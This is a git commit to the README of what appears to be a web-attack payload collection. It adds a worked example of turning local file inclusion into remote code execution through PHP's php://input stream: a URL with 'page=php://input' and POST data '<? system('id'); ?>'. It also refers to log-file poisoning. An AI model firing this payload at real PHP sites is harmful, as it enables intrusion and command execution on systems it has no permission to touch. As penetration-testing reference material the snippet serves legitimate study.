LFI to RCE via input:// stream

2024-12-19 19:06:12 +00:00 · 2017-09-24 00:37:56 +02:00 · 2017-09-24 00:37:56 +02:00 · 87ef554e40
commit 87ef554e40
parent 3e6043be32
1 changed files with 5 additions and 5 deletions
--- a/Traversal/README.md
+++ b/Traversal/README.md
@ -117,11 +117,11 @@ Use the script phpInfoLFI.py (also available at https://www.insomniasec.com/down


 ## LFI to RCE via input:// stream
-TODO
-file=php://input
-(specify your payload in the POST parameters,
-
-
+Specify your payload in the POST parameters
+```
+http://example.com/index.php?page=php://input
+POST DATA: <? system('id'); ?>
+```

 ## LFI to RCE via controlled log file
 Just append your PHP code into the log file and include it.